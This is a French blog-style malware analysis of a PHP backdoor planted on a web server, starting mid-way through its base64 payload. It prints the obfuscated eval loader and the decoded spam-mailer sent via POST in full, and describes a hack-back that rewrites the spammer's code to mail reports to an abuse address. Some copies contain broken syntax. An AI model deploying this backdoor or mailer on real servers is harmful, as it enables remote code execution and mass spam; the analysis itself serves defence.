AgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICJOb3QgQXZhaWxhYmxlIjsKICAgICAgICB9CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwaHBpbmZvKDgpOwogICAgICAgICRkYXRhWyJtb2R1bGVzIl0gPSBvYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9jbGVhbigpOwogICAgICAgICRkYXRhWyJleHRfY29ubmVjdCJdID0gZm9wZW4oImh0dHA6Ly93d3cueWEucnUvIiwgInIiKSA/IFRSVUUgOiBGQUxTRTsKICAgICAgICAkc2VyaWFsaXplc19kYXRhID0gc2VyaWFsaXplKCRkYXRhKTsKICAgICAgICAkZW5jb2RlZF9kYXRhID0gYmFzZTY0X2VuY29kZSgkc2VyaWFsaXplc19kYXRhKTsKICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl0gLiAkZW5jb2RlZF9kYXRhOwp9CgpmdW5jdGlvbiByZWd1bGFyX3Rlc3QoKQp7CgogICAgICAgICR0byA9ICJhaXJAZXhhbXBsZS5jb20iOwogICAgICAgICRzdWJqID0gIlNVQkohIjsKICAgICAgICAkbWVzc2FnZSA9ICJFSExPIjsKICAgICAgICAkcmVzID0gbWFpbCgkdG8sJHN1YmosJG1lc3NhZ2UpOwogICAgICAgIGlmKCRyZXMpCiAgICAgICAgewogICAgICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl07CiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIGVjaG8gc3RycmV2KCRfUE9TVFsidGVzdF9tZXNzYWdlIl0pOwogICAgICAgIH0KfQoKZnVuY3Rpb24gc2VuZCgpCnsKICAgICAgICAkY29kZSA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwcm9qZWN0Y29kZSJdKTsKCiAgICAgICAgZXZhbCgkY29kZSk7CiAgICAgICAgLy9yZXR1cm47Cn0K';
   //ppZiAAS8dDJF9Q*(#_+@#TWyJ
   $__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));


Qu'est donc que ce code tordu ?

La variable $___ est la fonction base64_decode() décryptant la variable $__, demandant elle-même le décryptage de la variable $_POST['code']

Analyse de ce qui se passe

Du code PHP envoyé en POST

Pour essayer de comprendre ce que le crackeur a derrière la tête, il faut donc le piéger et récupérer ce qu'il envoie en POST au script PHP... Nous allons donc essayer de récupérer ces informations précieuses en réécrivant le fichier.

Piéger ce code

Reprenons le fichier de départ, agrémenté au niveau de sa première ligne de :

 file_put_contents('/tmp/cracking_'.date('YmdHis').'.txt',print_r($_POST,true));
 die();

die(); mettant définitivement fin aux malversations du script, nous récupérons les informations sans fournir aucun service en retour...

Autopsie d'un code malveillant

1ère étape, réception des données en POST

Nous regardons en particulier la variable $_POST['code'] alors que les autres sont essentiellement du contenu de spam (email "publicitaire" ou mailveillant) et des destinataires.

 if(!isset($_POST["emails"])
        OR !isset($_POST["themes"])
        OR !isset($_POST["messages"])
        OR !isset($_POST["froms"])
)
{
    exit();
}

if(get_magic_quotes_gpc())
{
    foreach($_POST as $key => $post)
    {
        $_POST[$key] = stripcslashes($post);
    }
}

$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));

if(isset($_SERVER))
{
    $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
    }
}

if(isset($_FILES))
{
    foreach($_FILES as $key => $file)
    {
        $filename = alter_macros($aliases[$key]);
        $filename = num_macros($filename);
        $filename = text_macros($filename);
        $filename = xnum_macros($filename);
        $_FILES[$key]["name"] = $filename;
    }
}

if(empty($emails))
{
    exit();
}

foreach ($emails as $fteil => $email)
{
    $theme = $themes[array_rand($themes)];
    $theme = alter_macros($theme["theme"]);
    $theme = num_macros($theme);
    $theme = text_macros($theme);
    $theme = xnum_macros($theme);

    $message = $messages[array_rand($messages)];
    $message = alter_macros($message["message"]);
    $message = num_macros($message);
    $message = text_macros($message);
    $message = xnum_macros($message);
    $message = pass_macros($message, $passes);
    $message = fteil_macros($message, $fteil);

    $from = $froms[array_rand($froms)];
    $from = alter_macros($from["from"]);
    $from = num_macros($from);
    $from = text_macros($from);
    $from = xnum_macros($from);

    $mailer = $mailers[array_rand($mailers)];
    
    send_mail($from, $email, $theme, $message, $mailer);
} 

function send_mail($from, $to, $subj, $text, $mailer)
{
    $un = strtoupper(uniqid(time()));

    $head = "From: $from\n";
    $head .= "X-Mailer: $mailer\n";
    $head .= "Reply-To: $from\n";

    $head .= "Mime-Version: 1.0\n";
    $head .= "Content-Type: multipart/alternative;";
    $head .= "boundary=\"----------".$un."\"\n\n";
    
    $plain = strip_tags($text);
    $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
    
    $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
    $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
    $zag .= "------------".$un."--";
    
    if(count($_FILES) > 0)
    {
        foreach($_FILES as $file)
        {
            if(file_exists($file["tmp_name"]))
            {
                $f = fopen($file["tmp_name"], "rb");
                $zag .= "------------".$un."\n";
                $zag .= "Content-Type: application/octet-stream;";
                $zag .= "name=\"".$file["name"]."\"\n";
                $zag .= "Content-Transfer-Encoding:base64\n";
                $zag .= "Content-Disposition:attachment;";
                $zag .= "filename=\"".$file["name"]."\"\n\n";
                $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
                fclose($f);
            }
        }
    }

    if(@mail($to, $subj, $zag, $head))
    {
        if(!empty($_POST['verbose']))
            echo "SENDED";
    }
    else
    {
        if(!empty($_POST['verbose']))
            echo "FAIL";
    }
    usleep(300);
}

function alter_macros($content)
{
    preg_match_all('#{(.*)}#Ui', $content, $matches);

    for($i = 0; $i < count($matches[1]); $i++)
    {

        $ns = explode("|", $matches[1][$i]);
        $c2 = count($ns);
        $rand = rand(0, ($c2 - 1));
        $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
    }
    return $content;
}

function text_macros($content)
{
    preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $word = generate_word($rand);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }

    preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $count = $matches[1][$i];

        $word  = generate_word($count);

        $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
    }


    return $content;
}

function xnum_macros($content)
{
    preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $num = $matches[1][$i];
        $min = pow(10, $num - 1);
        $max = pow(10, $num) - 1;

        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function num_macros($content)
{
    preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);

    for($i = 0; $i < count($matches[0]); $i++)
    {
        $min = $matches[1][$i];
        $max = $matches[2][$i];
        $rand = rand($min, $max);
        $content = str_replace($matches[0][$i], $rand, $content);
    }
    return $content;
}

function generate_word($length)
{
    $chars = 'abcdefghijklmnopqrstuvyxz';
    $numChars = strlen($chars);
    $string = '';
    for($i = 0; $i < $length; $i++)
    {
        $string .= substr($chars, rand(1, $numChars) - 1, 1);
    }
    return $string;
}

function pass_macros($content, $passes)
{
    $pass = array_pop($passes);
    
    return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
    return str_replace("[FTEIL]", $fteil, $content);
}

function from_host($content)
{
    if(empty($replace))
    {
        $replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
        $pos = strpos($replace, "@");
        $replace = substr($replace, $pos);
    }
    
    $replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
    $replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
    
    $domains = @explode(".", $replace);
    if(!empty($domains))
    {
        $level1 = @array_pop($domains);
        $level2 = @array_pop($domains);
        $replace = $level2.".".$level1;
    }
    
    return str_replace("[FHOST]", $replace, $content);
}


Nous la décryptons donc en base64 toujours :

 if(!isset($_POST["emails"])
       OR !isset($_POST["themes"])
       OR !isset($_POST["messages"])
       OR !isset($_POST["froms"])
 )
 {
   exit();
 }
 
 if(get_magic_quotes_gpc())
 {
   foreach($_POST as $key => $post)
   {
       $_POST[$key] = stripcslashes($post);
   }
 }
 
 $emails = @unserialize(base64_decode($_POST["emails"]));
 $themes = @unserialize(base64_decode($_POST["themes"]));
 $messages = @unserialize(base64_decode($_POST["messages"]));
 $froms = @unserialize(base64_decode($_POST["froms"]));
 $mailers = @unserialize(base64_decode($_POST["mailers"]));
 $aliases = @unserialize(base64_decode($_POST["aliases"]));
 $passes = @unserialize(base64_decode($_POST["passes"]));
 
 if(isset($_SERVER))
 {
   $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
   if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
   {
       $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
   }
 }
 
 if(isset($_FILES))
 {
   foreach($_FILES as $key => $file)
   {
       $filename = alter_macros($aliases[$key]);
       $filename = num_macros($filename);
       $filename = text_macros($filename);
       $filename = xnum_macros($filename);
       $_FILES[$key]["name"] = $filename;
   }
 }
 
 if(empty($emails))
 {
   exit();
 }
 
 foreach ($emails as $fteil => $email)
 {
   $theme = $themes[array_rand($themes)];
   $theme = alter_macros($theme["theme"]);
   $theme = num_macros($theme);
   $theme = text_macros($theme);
   $theme = xnum_macros($theme);
 
   $message = $messages[array_rand($messages)];
   $message = alter_macros($message["message"]);
   $message = num_macros($message);
   $message = text_macros($message);
   $message = xnum_macros($message);
   $message = pass_macros($message, $passes);
   $message = fteil_macros($message, $fteil);
 
   $from = $froms[array_rand($froms)];
   $from = alter_macros($from["from"]);
   $from = num_macros($from);
   $from = text_macros($from);
   $from = xnum_macros($from);
 
   $mailer = $mailers[array_rand($mailers)];
   
   send_mail($from, $email, $theme, $message, $mailer);
 } 
 
 function send_mail($from, $to, $subj, $text, $mailer)
 {
   $un = strtoupper(uniqid(time()));
 
   $head = "From: $from\n";
   $head .= "X-Mailer: $mailer\n";
   $head .= "Reply-To: $from\n";
 
   $head .= "Mime-Version: 1.0\n";
   $head .= "Content-Type: multipart/alternative;";
   $head .= "boundary=\"----------".$un."\"\n\n";
   
   $plain = strip_tags($text);
   $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
   $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
   
   $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
   $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
   $zag .= "------------".$un."--";
   
   if(count($_FILES) > 0)
   {
       foreach($_FILES as $file)
       {
           if(file_exists($file["tmp_name"]))
           {
               $f = fopen($file["tmp_name"], "rb");
               $zag .= "------------".$un."\n";
               $zag .= "Content-Type: application/octet-stream;";
               $zag .= "name=\"".$file["name"]."\"\n";
               $zag .= "Content-Transfer-Encoding:base64\n";
               $zag .= "Content-Disposition:attachment;";
               $zag .= "filename=\"".$file["name"]."\"\n\n";
               $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
               fclose($f);
           }
       }
   }
 
   if(@mail($to, $subj, $zag, $head))
   {
       if(!empty($_POST['verbose']))
           echo "SENDED";
   }
   else
   {
       if(!empty($_POST['verbose']))
           echo "FAIL";
   }
   usleep(300);
 }
 
 function alter_macros($content)
 {
   preg_match_all('#{(.*)}#Ui', $content, $matches);
 
   for($i = 0; $i < count($matches[1]); $i++)
   {
 
       $ns = explode("|", $matches[1][$i]);
       $c2 = count($ns);
       $rand = rand(0, ($c2 - 1));
       $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
   }
   return $content;
 }
 
 function text_macros($content)
 {
   preg_match_all('#\[TEXT\-(digit:+)\-(digit:+)\]#', $content, $matches);
 
   for($i = 0; $i < count($matches[0]); $i++)
   {
       $min = $matches[1][$i];
       $max = $matches[2][$i];
       $rand = rand($min, $max);
       $word = generate_word($rand);
 
       $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
   }
 
   preg_match_all('#\[TEXT\-(digit:+)\]#', $content, $matches);
 
   for($i = 0; $i < count($matches[0]); $i++)
   {
       $count = $matches[1][$i];
 
       $word  = generate_word($count);
 
       $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
   }
 
 
   return $content;
 }
 
 function xnum_macros($content)
 {
   preg_match_all('#\[NUM\-(digit:+)\]#', $content, $matches);
 
   for($i = 0; $i < count($matches[0]); $i++)
   {
       $num = $matches[1][$i];
       $min = pow(10, $num - 1);
       $max = pow(10, $num) - 1;
 
       $rand = rand($min, $max);
       $content = str_replace($matches[0][$i], $rand, $content);
   }
   return $content;
 }
 
 function num_macros($content)
 {
   preg_match_all('#\[RAND\-(digit:+)\-(digit:+)\]#', $content, $matches);
 
   for($i = 0; $i < count($matches[0]); $i++)
   {
       $min = $matches[1][$i];
       $max = $matches[2][$i];
       $rand = rand($min, $max);
       $content = str_replace($matches[0][$i], $rand, $content);
   }
   return $content;
 }
 
 function generate_word($length)
 {
   $chars = 'abcdefghijklmnopqrstuvyxz';
   $numChars = strlen($chars);
   $string = ;
   for($i = 0; $i < $length; $i++)
   {
       $string .= substr($chars, rand(1, $numChars) - 1, 1);
   }
   return $string;
 }
 
 function pass_macros($content, $passes)
 {
   $pass = array_pop($passes);
   
   return str_replace("[PASS]", $pass, $content);
 }
 
 function fteil_macros($content, $fteil)
 {    
   return str_replace("[FTEIL]", $fteil, $content);
 }
 
 function from_host($content)
 {
   if(empty($replace))
   {
       $replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
       $pos = strpos($replace, "@");
       $replace = substr($replace, $pos);
   }
   
   $replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
   $replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
   
   $domains = @explode(".", $replace);
   if(!empty($domains))
   {
       $level1 = @array_pop($domains);
       $level2 = @array_pop($domains);
       $replace = $level2.".".$level1;
   }
   
   return str_replace("[FHOST]", $replace, $content);
 }

Sur plusieurs envois, pour le moment ce code est toujours le même. Considérons donc pour le moment que ce code est celui à analyser.

Étape 2, trouver à quel endroit les emails partent

C'est très simplement en utilisant la fonction mail() de PHP que le script envoie ses spams. Nous pouvons maintenant ellaborer une stratégie de riposte intelligente.


Étape 3, modifier le comportement de ce script pour "fight back"

Nous allons donc prendre le code envoyé en POST, décrypté bien entendu, et le modifier. Seul la partie où les courriels sont envoyés via la fonction mail() nous intéresse :

// dans la fonction send_mail()
if(@mail($to, $subj, $zag, $head))

Modifions la variable $to pour y mettre le responsable "abuse" de la plage d'adresse IP utilisée par notre petit script-kiddy. Ici l'adresse IP est 31.184.244.18, et après un whois sur cette adresse il s'avère que l'adresse "abuse" est admin@toencompany.net.

C'est parti !

Concrêtement

Le code modifié

  // ...
  // HACKING-THE-CRACKER ADDON
  $subj = "SPAM/CRACK REPORT / Original subject: $subj / Original RCPT: $to";
  $to = 'admin@toencompany.net';
  $youremail = 'postmaster@YOURDOMAIN.TLD"
  $zag = "CONTACT US FOR FURTHER EXPLANATION: $youremail\n\n\n\nORIGINAL SERVER VARS: ".print_r($_SERVER,true)."\n\n\n\n\nORIGINAL SPAMMING CONTENT:\n\n\n\n\n".$zag;
  
  if(@mail($to, $subj, $zag, $head))
  // ...

NOTES:

  • N'oubliez pas de remplacer postmaster@YOURDOMAIN.TLD par la bonne adresse email...
  • N'oubliez pas de remplacer admin@toencompany.net par l'adresse réelle du abuse responsable de l'adresse IP qui cherche à vous attaquer...

Le code au complet

if(!isset($_POST["emails"])
      OR !isset($_POST["themes"])
      OR !isset($_POST["messages"])
      OR !isset($_POST["froms"])
)
{
  exit();
}

if(get_magic_quotes_gpc())
{
  foreach($_POST as $key => $post)
  {
      $_POST[$key] = stripcslashes($post);
  }
}

$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));

if(isset($_SERVER))
{
  $_SERVER['REMOTE_ADDR'] = "127.0.0.1";
  if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
  {
      $_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
  }
}

if(isset($_FILES))
{
  foreach($_FILES as $key => $file)
  {
      $filename = alter_macros($aliases[$key]);
      $filename = num_macros($filename);
      $filename = text_macros($filename);
      $filename = xnum_macros($filename);
      $_FILES[$key]["name"] = $filename;
  }
}

if(empty($emails))
{
  exit();
}

foreach ($emails as $fteil => $email)
{
  $theme = $themes[array_rand($themes)];
  $theme = alter_macros($theme["theme"]);
  $theme = num_macros($theme);
  $theme = text_macros($theme);
  $theme = xnum_macros($theme);

  $message = $messages[array_rand($messages)];
  $message = alter_macros($message["message"]);
  $message = num_macros($message);
  $message = text_macros($message);
  $message = xnum_macros($message);
  $message = pass_macros($message, $passes);
  $message = fteil_macros($message, $fteil);

  $from = $froms[array_rand($froms)];
  $from = alter_macros($from["from"]);
  $from = num_macros($from);
  $from = text_macros($from);
  $from = xnum_macros($from);

  $mailer = $mailers[array_rand($mailers)];
  
  send_mail($from, $email, $theme, $message, $mailer);
} 

function send_mail($from, $to, $subj, $text, $mailer)
{
  $un = strtoupper(uniqid(time()));

  $head = "From: $from\n";
  $head .= "X-Mailer: $mailer\n";
  $head .= "Reply-To: $from\n";

  $head .= "Mime-Version: 1.0\n";
  $head .= "Content-Type: multipart/alternative;";
  $head .= "boundary=\"----------".$un."\"\n\n";
  
  $plain = strip_tags($text);
  $zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
  $zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
  
  $zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
  $zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
  $zag .= "------------".$un."--";
  
  if(count($_FILES) > 0)
  {
      foreach($_FILES as $file)
      {
          if(file_exists($file["tmp_name"]))
          {
              $f = fopen($file["tmp_name"], "rb");
              $zag .= "------------".$un."\n";
              $zag .= "Content-Type: application/octet-stream;";
              $zag .= "name=\"".$file["name"]."\"\n";
              $zag .= "Content-Transfer-Encoding:base64\n";
              $zag .= "Content-Disposition:attachment;";
              $zag .= "filename=\"".$file["name"]."\"\n\n";
              $zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
              fclose($f);
          }
      }
  }
  
  // HACKING-THE-CRACKER ADDON
  $subj = "SPAM/CRACK REPORT / Original subject: $subj / Original RCPT: $to";
  $to = 'admin@toencompany.net';
  $youremail = 'postmaster@YOURDOMAIN.TLD"
  $zag = "CONTACT US FOR FURTHER EXPLANATION: $youremail\n\n\n\nORIGINAL SERVER VARS: ".print_r($_SERVER,true)."\n\n\n\n\nORIGINAL SPAMMING CONTENT:\n\n\n\n\n".$zag;
  
  if(@mail($to, $subj, $zag, $head))
  {
      if(!empty($_POST['verbose']))
          echo "SENDED";
  }
  else
  {
      if(!empty($_POST['verbose']))
          echo "FAIL";
  }
  usleep(300);
}

function alter_macros($content)
{
  preg_match_all('#{(.*)}#Ui', $content, $matches);

  for($i = 0; $i < count($matches[1]); $i++)
  {

      $ns = explode("|", $matches[1][$i]);
      $c2 = count($ns);
      $rand = rand(0, ($c2 - 1));
      $content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
  }
  return $content;
}

function text_macros($content)
{
  preg_match_all('#\[TEXT\-(digit:+)\-(digit:+)\]#', $content, $matches);

  for($i = 0; $i < count($matches[0]); $i++)
  {
      $min = $matches[1][$i];
      $max = $matches[2][$i];
      $rand = rand($min, $max);
      $word = generate_word($rand);

      $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
  }

  preg_match_all('#\[TEXT\-(digit:+)\]#', $content, $matches);

  for($i = 0; $i < count($matches[0]); $i++)
  {
      $count = $matches[1][$i];

      $word  = generate_word($count);

      $content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
  }


  return $content;
}

function xnum_macros($content)
{
  preg_match_all('#\[NUM\-(digit:+)\]#', $content, $matches);

  for($i = 0; $i < count($matches[0]); $i++)
  {
      $num = $matches[1][$i];
      $min = pow(10, $num - 1);
      $max = pow(10, $num) - 1;

      $rand = rand($min, $max);
      $content = str_replace($matches[0][$i], $rand, $content);
  }
  return $content;
}

function num_macros($content)
{
  preg_match_all('#\[RAND\-(digit:+)\-(digit:+)\]#', $content, $matches);

  for($i = 0; $i < count($matches[0]); $i++)
  {
      $min = $matches[1][$i];
      $max = $matches[2][$i];
      $rand = rand($min, $max);
      $content = str_replace($matches[0][$i], $rand, $content);
  }
  return $content;
}

function generate_word($length)
{
  $chars = 'abcdefghijklmnopqrstuvyxz';
  $numChars = strlen($chars);
  $string = ;
  for($i = 0; $i < $length; $i++)
  {
      $string .= substr($chars, rand(1, $numChars) - 1, 1);
  }
  return $string;
}

function pass_macros($content, $passes)
{
  $pass = array_pop($passes);
  
  return str_replace("[PASS]", $pass, $content);
}

function fteil_macros($content, $fteil)
{    
  return str_replace("[FTEIL]", $fteil, $content);
}

function from_host($content)
{
  if(empty($replace))
  {
      $replace = (!empty($_SERVER['SERVER_ADMIN'])) ? $_SERVER['SERVER_ADMIN'] : NULL;
      $pos = strpos($replace, "@");
      $replace = substr($replace, $pos);
  }
  
  $replace = (empty($replace) AND ! empty($_SERVER['SERVER_NAME'])) ? $_SERVER['SERVER_NAME'] : NULL;
  $replace = (empty($replace) AND ! empty($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : NULL;
  
  $domains = @explode(".", $replace);
  if(!empty($domains))
  {
      $level1 = @array_pop($domains);
      $level2 = @array_pop($domains);
      $replace = $level2.".".$level1;
  }
  
  return str_replace("[FHOST]", $replace, $content);
}


The end

Il n'y a plus qu'à laisser faire.

Enjoy.

Remarques à envoyer à beta_AT_e-glop.net (_AT_ / @)


Ressources externes

http://forums.whirlpool.net.au/archive/2072084

Catérogie:Informatique